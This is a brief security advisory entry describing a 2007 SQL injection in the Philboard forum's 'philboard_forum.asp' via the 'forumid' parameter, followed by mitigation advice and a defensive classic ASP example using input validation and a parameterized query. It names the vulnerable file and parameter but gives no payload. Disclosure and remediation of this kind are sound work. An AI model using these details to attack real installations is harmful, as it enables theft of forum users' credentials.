vendor: Philboard
by: xoron
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: Philboard
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Philboard (id) Remote SQL Injection
The vulnerability exists in the 'philboard_forum.asp' file, where an attacker can inject SQL queries through the 'forumid' parameter. By manipulating the SQL query, an attacker can retrieve sensitive information such as usernames and passwords from the database.
Mitigation:
To mitigate this vulnerability, it is recommended to sanitize user input before using it in SQL queries or use prepared statements.
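The mitigation above, sketched for classic ASP as an added example (not Philboard's own code): `forumid` is accepted only as a short decimal integer and then bound as a typed parameter rather than concatenated into the SQL string. The table and column names (`forums`, `id`, `forum_name`) and the `PhilboardConnString` application setting are hypothetical, since the page does not show Philboard's schema.

```vbscript
<%
Option Explicit

' ADO constants (values from the ADO type library).
Const adCmdText = 1, adInteger = 3, adParamInput = 1

' Accept only 1-9 decimal digits so the value always fits in a Long.
' Returns -1 for anything else (empty, signed, quoted, repeated parameter).
Function ParseForumId(raw)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    If re.Test(raw) Then
        ParseForumId = CLng(raw)
    Else
        ParseForumId = -1
    End If
End Function

Dim forumId, conn, cmd, rs
forumId = ParseForumId(Request.QueryString("forumid") & "")

If forumId < 0 Then
    ' Reject instead of trying to "clean" the value.
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("PhilboardConnString") ' hypothetical setting name

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' Hypothetical schema; the ? placeholder is bound below, never concatenated.
cmd.CommandText = "SELECT forum_name FROM forums WHERE id = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , forumId)

Set rs = cmd.Execute
If Not rs.EOF Then
    ' Encode on output so stored data cannot inject markup.
    Response.Write Server.HTMLEncode(rs("forum_name") & "")
End If
rs.Close
conn.Close
%>
```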